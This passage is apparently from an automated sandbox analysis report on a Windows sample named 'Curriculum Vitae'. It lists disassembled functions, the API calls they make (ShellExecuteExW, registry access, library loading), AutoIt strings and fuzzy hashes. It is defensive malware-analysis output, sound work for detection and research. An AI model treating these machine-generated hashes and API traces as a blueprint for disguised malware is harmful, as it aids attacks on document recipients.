                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: 17141a6bc8d3a4eb164d9a0c2e5faeaad28a22ce42d69b9a59ef331a7a23b51b
                      • Instruction ID: f4b7640a143a469afc27a094c308c91ec2cdc2853e4b535bdd94bfafc1682293
                      • Opcode Fuzzy Hash: 17141a6bc8d3a4eb164d9a0c2e5faeaad28a22ce42d69b9a59ef331a7a23b51b
                      • Instruction Fuzzy Hash: EBF09A7265025ABBE7205BA39C0EEEF3A7CEFCAB15F001158F705D12A0D7A01A01CAB4
                      Function 00D87439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?), ref: 00D87452
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D87469
                      • GetWindowDC.USER32(?), ref: 00D87475
                      • GetPixel.GDI32(00000000,?,?), ref: 00D87484
                      • ReleaseDC.USER32(?,00000000), ref: 00D87496
                      • GetSysColor.USER32(00000005), ref: 00D874B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                      • String ID:
                      • API String ID: 272304278-0
                      • Opcode ID: 8e2f6da85db06002a4cdc8123e5401ca5b6d128e83d725f45fcc488f62898293
                      • Instruction ID: e3157ac32ec8fcb78dc97f4f585f2aa1501aea9634fee32ce1d148cb86726a3e
                      • Opcode Fuzzy Hash: 8e2f6da85db06002a4cdc8123e5401ca5b6d128e83d725f45fcc488f62898293
                      • Instruction Fuzzy Hash: BF018B31410206EFDB10AFA8DC08FAA7BB5FB04311F251060FA19E22B1CB315E42AB60
                      Function 00D91874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D9187F
                      • UnloadUserProfile.USERENV(?,?), ref: 00D9188B
                      • CloseHandle.KERNEL32(?), ref: 00D91894
                      • CloseHandle.KERNEL32(?), ref: 00D9189C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D918A5
                      • HeapFree.KERNEL32(00000000), ref: 00D918AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: 2f49610e0b8ffb1004938865ea69100d3b190d59becab29f9bea4cdabae18ba6
                      • Instruction ID: 0fb18e3fe7484b5a5b17a893e091f94b1dd69c3532bf18627417f8994bf50fcb
                      • Opcode Fuzzy Hash: 2f49610e0b8ffb1004938865ea69100d3b190d59becab29f9bea4cdabae18ba6
                      • Instruction Fuzzy Hash: C0E0C236514703BBDB015BE2ED0CD0ABB29FB59B22B109220F329C16B0CB329420DF60
                      Function 00D3BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                      Download Yara Rule
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D3BEB3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: D%$D%$D%$D%
                      • API String ID: 1385522511-2722557190
                      • Opcode ID: e1c02f41184f9c99738a3183fa66367aceecca7f8bbfb16a6d7bfe4762eb2544
                      • Instruction ID: d52176be49d50ac7d3dd01d0684885f0aa64b25f7f3bfe3f5b09ad885f80ab69
                      • Opcode Fuzzy Hash: e1c02f41184f9c99738a3183fa66367aceecca7f8bbfb16a6d7bfe4762eb2544
                      • Instruction Fuzzy Hash: 05912B75A00206CFCB24CF69C4916A9B7F1FF58324F24416EDA86AB350D731E981CBA0
                      Function 00D9C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D9C6EE
                      • _wcslen.LIBCMT ref: 00D9C735
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D9C79C
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D9C7CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ItemMenu$Info_wcslen$Default
                      • String ID: 0
                      • API String ID: 1227352736-4108050209
                      • Opcode ID: 5178c53e3049458bd821f130bdc707b8ea8ac6bd0a791e9eae221aae9dbf29e7
                      • Instruction ID: c58e408371316ceda77bf91e909a4bb9eca960886ca2122fbdee37fccfeacf78
                      • Opcode Fuzzy Hash: 5178c53e3049458bd821f130bdc707b8ea8ac6bd0a791e9eae221aae9dbf29e7
                      • Instruction Fuzzy Hash: C151CF716243019BDB109F68C885B6B77E4EF89310F082A2DF995E71E0DB70D9448B72
                      Function 00DBAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                      Download Yara Rule
                      APIs
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00DBAEA3
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • GetProcessId.KERNEL32(00000000), ref: 00DBAF38
                      • CloseHandle.KERNEL32(00000000), ref: 00DBAF67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseExecuteHandleProcessShell_wcslen
                      • String ID: <$@
                      • API String ID: 146682121-1426351568
                      • Opcode ID: a80951874f209894c17be460e5e0c5431812ee77692cc25dd289ce67aa8919ca
                      • Instruction ID: cb0e7158adaa94e1def663b4f48f52a6ad1bed1887457532b1dd7c735137ab60
                      • Opcode Fuzzy Hash: a80951874f209894c17be460e5e0c5431812ee77692cc25dd289ce67aa8919ca
                      • Instruction Fuzzy Hash: DA714575A00619DFCB14DF59C484A9EBBF0EF08310F048499E856AB3A2CB74ED45CBB1
                      Function 00D9719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D97206
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D9723C
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D9724D
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D972CF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 21781b0ec9747b4afc49f1bb50ece13732318165561893646208bcb60ed462f9
                      • Instruction ID: 8df1feccaac4c8f76dcd35a6e1cf55308afe631a0fa4801e2b12fc8fb5fc7b9b
                      • Opcode Fuzzy Hash: 21781b0ec9747b4afc49f1bb50ece13732318165561893646208bcb60ed462f9
                      • Instruction Fuzzy Hash: 8E416AB1A24205EFDF15CF54C884A9A7BA9EF44710F2981A9BD099F20AD7B0D944CBB0
                      Function 00DC2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DC2F8D
                      • LoadLibraryW.KERNEL32(?), ref: 00DC2F94
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DC2FA9
                      • DestroyWindow.USER32(?), ref: 00DC2FB1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyLibraryLoadWindow
                      • String ID: SysAnimate32
                      • API String ID: 3529120543-1011021900
                      • Opcode ID: a701d8a0a521eed7eb25de8a272aab2a2ef95355de76312a4ef1d3dc3da63846
                      • Instruction ID: f71034f3523a914d7a2d07ad872a91722d5a659c5790dd42ba9c4e26bdfc1633
                      • Opcode Fuzzy Hash: a701d8a0a521eed7eb25de8a272aab2a2ef95355de76312a4ef1d3dc3da63846
                      • Instruction Fuzzy Hash: C321887120020AABEB218F669C80FBB77B9EF59364F14521CFA50D71A0D671DC919770
                      Function 00D54D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D54D1E,00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002), ref: 00D54D8D
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D54DA0
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D54D1E,00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000), ref: 00D54DC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: e5e4aa2e0ea1d8214ccc8f0258028d96c56449a13463e72867f0b5f3890adbfb
                      • Instruction ID: 7e018f671950b18f8d224eca1d20794000735a7eeaaf4f1acfb1ee9b1b9ff1a2
                      • Opcode Fuzzy Hash: e5e4aa2e0ea1d8214ccc8f0258028d96c56449a13463e72867f0b5f3890adbfb
                      • Instruction Fuzzy Hash: 9FF03C34A5030ABBDB119F91DC49BAEBFB5EF44756F0800A5ED09E6260CB305989CAB1
                      Function 00D8D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32 ref: 00D8D3AD
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D8D3BF
                      • FreeLibrary.KERNEL32(00000000), ref: 00D8D3E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: GetSystemWow64DirectoryW$X64
                      • API String ID: 145871493-2590602151
                      • Opcode ID: 4190ae865fe6bf5db5ec1eceadc60cb1db5ca991ff11fd6d78b697bce32214b7
                      • Instruction ID: 15fec189008c56897603fd47f63fe4fcf8e4f3e1a6a6486a58fcb922f8dedceb
                      • Opcode Fuzzy Hash: 4190ae865fe6bf5db5ec1eceadc60cb1db5ca991ff11fd6d78b697bce32214b7
                      • Instruction Fuzzy Hash: 6FF02031801B22ABC7313B108C08E69B322AF01701B599158EA8AE22D1CB20CD4087B6
                      Function 00D34E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E9C
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D34EAE
                      • FreeLibrary.KERNEL32(00000000,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 145871493-3689287502
                      • Opcode ID: 31f6af6fa7f1ef6bd371f61c22faf23f7c7a46de452cbe598665d9689eacbaf5
                      • Instruction ID: cfbf61df13cbe66f07fce1fab9703dd6b284a4dba20df11898830026a04e73f9
                      • Opcode Fuzzy Hash: 31f6af6fa7f1ef6bd371f61c22faf23f7c7a46de452cbe598665d9689eacbaf5
                      • Instruction Fuzzy Hash: 92E08635A117235F92211B266C18F6B6554AF81B62B0D0115FE08E2310DB64DD0641B1
                      Function 00D34E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E62
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D34E74
                      • FreeLibrary.KERNEL32(00000000,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E87
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 145871493-1355242751
                      • Opcode ID: 1256ced1daa77962d3fa1b295fbcd331b9e6317283e30ff1c0ef910b50e1501a
                      • Instruction ID: b88a0a1a0523b7986eccdd6218675e21cdf8223cc258c94b3d283b3f078b9db8
                      • Opcode Fuzzy Hash: 1256ced1daa77962d3fa1b295fbcd331b9e6317283e30ff1c0ef910b50e1501a
                      • Instruction Fuzzy Hash: 51D0C2329127235B46221B26AC08E8B2A18AF81F1130E0114FA08F2210CF24CD0281F0
                      Function 00DBA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcessId.KERNEL32 ref: 00DBA427
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DBA435
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DBA468
                      • CloseHandle.KERNEL32(?), ref: 00DBA63D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CloseCountersCurrentHandleOpen
                      • String ID:
                      • API String ID: 3488606520-0
                      • Opcode ID: d841e6f2fc6857b449972c7bc9c58363f01a23d33de3a3db3fdbfa910ebe8027
                      • Instruction ID: eed26ac6139d4f4071b4f8b2451a76c7989bdbb1da8fb1231823dc910e06c097
                      • Opcode Fuzzy Hash: d841e6f2fc6857b449972c7bc9c58363f01a23d33de3a3db3fdbfa910ebe8027
                      • Instruction Fuzzy Hash: 42A193716047019FD720DF18C886F6AB7E5EF84714F14885DF69A9B392D770EC418BA1
                      Function 00D6BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DD3700), ref: 00D6BB91
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D6BC09
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E01270,000000FF,?,0000003F,00000000,?), ref: 00D6BC36
                      • _free.LIBCMT ref: 00D6BB7F
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6BD4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                      • String ID:
                      • API String ID: 1286116820-0
                      • Opcode ID: 5fc767d921e47c7d6c9d233492d421c5fa156f49305d0c5ad9ff408866851d3c
                      • Instruction ID: a4de94fb29a42c9119f25a986d33e8d6024a79fa5bb57871d3f65719102dd1aa
                      • Opcode Fuzzy Hash: 5fc767d921e47c7d6c9d233492d421c5fa156f49305d0c5ad9ff408866851d3c
                      • Instruction Fuzzy Hash: 3151A971900209AFCB10DF799C8197AB7B8EF44370B15426BE555E72A1EB309EC59B70
                      Function 00D9E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D9CF22,?), ref: 00D9DDFD
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D9CF22,?), ref: 00D9DE16
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • lstrcmpiW.KERNEL32(?,?), ref: 00D9E473
                      • MoveFileW.KERNEL32(?,?), ref: 00D9E4AC
                      • _wcslen.LIBCMT ref: 00D9E5EB
                      • _wcslen.LIBCMT ref: 00D9E603
                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D9E650
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                      • String ID:
                      • API String ID: 3183298772-0
                      • Opcode ID: a5cfee3ed3f75742fe46e00c3118ae009ec0399accbddfd1855c8cde8f7f0adc
                      • Instruction ID: 0e4c84e771ebe85b8a7f0aeb52e2e99aa539bfc154efdc8a4d5234804e508af6
                      • Opcode Fuzzy Hash: a5cfee3ed3f75742fe46e00c3118ae009ec0399accbddfd1855c8cde8f7f0adc
                      • Instruction Fuzzy Hash: 31514FB24083459BCB24EB94D8919DFB3ECEF85340F04491EF689D3191EE74E6888B76
                      Function 00DBB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBBAA5
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBBB00
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DBBB63
                      • RegCloseKey.ADVAPI32(?,?), ref: 00DBBBA6
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBBBB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
